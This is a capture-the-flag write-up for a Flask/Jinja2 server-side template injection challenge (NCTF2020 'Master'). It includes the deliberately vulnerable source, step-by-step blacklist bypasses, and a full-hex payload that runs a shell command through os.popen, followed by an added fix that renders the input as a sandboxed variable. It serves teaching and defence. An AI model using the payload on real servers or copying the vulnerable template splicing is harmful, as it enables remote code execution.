SSTI injection bypass - Jinja2 templates
The challenge is Master from NCTF2020.
Source code:
from jinja2 import Template
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'guest')
    blacklist = ['%', '-', ':', '+', 'class', 'ba', 'mro', '_', 'config', 'args', 'init', 'global', '.', '\'', 'req',
                 '|', 'attr', 'get']
    for i in blacklist:
        if i in name:
            return Template('你真是个小可爱').render()
    # user input is spliced into the template source, which is the SSTI
    t = Template("早安,打工人<br/>你就是我的" + name + "吗?<br/><!-- ?name=master -->")
    return t.render()

if __name__ == "__main__":
    app.run()
01 A lot is filtered; when working the challenge you can use Burp to find the filtered words.
02 The bypass approach:
1. The original expression is: ().__class__.__bases__[0].__subclasses__()
2. The dot is filtered, so use ["..."] indexing instead: ()["__class__"]["__bases__"][0]["__subclasses__"]()
3. The underscore is filtered, so use the hex escape \x5f instead: ()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()
4. Keywords are filtered, so split them with string concatenation: ()["\x5f\x5fcla"+"ss\x5f\x5f"]["\x5f\x5fbas"+"es\x5f\x5f"][0]["\x5f\x5fsubc"+"lasses\x5f\x5f"]()
5. Filter bypassed.
6. This challenge had an unintended solution, though: the plus sign is in the blacklist, but in the concatenated payload the plus sign simply disappears (in a query string it decodes to a space, and Jinja2 joins adjacent string literals). You can also bypass the filter by writing everything in hex; that only works in the SSTI context.
Full-hex payload (found online):
name={{""["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[64]["\x5f\x5f\x69\x6e\x69\x74\x5f\x5f"]["\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f"]["\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f"]["\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f"]("\x6f\x73")["\x70\x6f\x70\x65\x6e"]("ls")["\x72\x65\x61\x64"]()}}
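An added example in Python (not the writeup's or the challenge's code): it copies the blacklist from the source above, shows why the check misses the \x5f and split-literal forms of steps 3 and 4 and the all-hex payload, and then the fix that makes the blacklist unnecessary, passing name to render() as a variable instead of splicing it into the template source. canonicalize, canonical_blocked, hardened_index and TEMPLATE are names chosen here; SandboxedEnvironment is jinja2's real sandbox class.

```python
# Added example (not from the writeup or the challenge): why the Master
# blacklist misses the payloads above, and the fix that needs no blacklist.
import re
from urllib.parse import unquote_plus

# The challenge's blacklist, copied from the source above.
BLACKLIST = ['%', '-', ':', '+', 'class', 'ba', 'mro', '_', 'config', 'args',
             'init', 'global', '.', "'", 'req', '|', 'attr', 'get']

def naive_blocked(name: str) -> bool:
    """The check as written: substring match on the URL-decoded value."""
    return any(word in name for word in BLACKLIST)

def canonicalize(name: str) -> str:
    """Rewrite the input into what Jinja2 will actually evaluate.

    Jinja2 decodes string literals with the unicode-escape codec, so
    "\\x5f\\x5f" means "__", and it joins adjacent string literals, so
    "cla" "ss" means "class". A '+' in a query string decodes to a space,
    which is how the '+' in step 4 above got past the '+' filter.
    """
    decoded = name.encode("ascii", "backslashreplace").decode("unicode_escape")
    return re.sub(r'"\s+"', "", decoded)

def canonical_blocked(name: str) -> bool:
    """Same blacklist after canonicalisation: catches the hex and split-literal
    forms, but still rejects harmless names such as 'Sebastian' ('ba')."""
    return naive_blocked(canonicalize(name))

# Hypothetical hardened template: the name is a variable, not template source.
TEMPLATE = "早安,打工人<br/>你就是我的{{ name }}吗?<br/>"

def hardened_index(name: str) -> str:
    """The real fix: untrusted input is passed to render(), never spliced into
    the template string, so braces and escapes in it stay plain text; the
    sandbox and autoescape are defence in depth. jinja2 is imported lazily so
    the checks above also work where it is not installed."""
    from jinja2.sandbox import SandboxedEnvironment
    env = SandboxedEnvironment(autoescape=True)
    return env.from_string(TEMPLATE).render(name=name)

if __name__ == "__main__":
    # Constructed samples: step 4 as the browser sends it, and an all-hex key.
    step4 = unquote_plus('()["\\x5f\\x5fcla"+"ss\\x5f\\x5f"]')
    allhex = '""["\\x5f\\x5f\\x63\\x6c\\x61\\x73\\x73\\x5f\\x5f"]'
    for sample in (step4, allhex, "master", "Sebastian"):
        print(repr(sample), naive_blocked(sample), canonical_blocked(sample))
    print(hardened_index("{{ 7*7 }}"))  # the braces are rendered literally
```

The lesson is the last function: once name is a template variable, nothing the user types is parsed as template syntax, so no blacklist is needed at all.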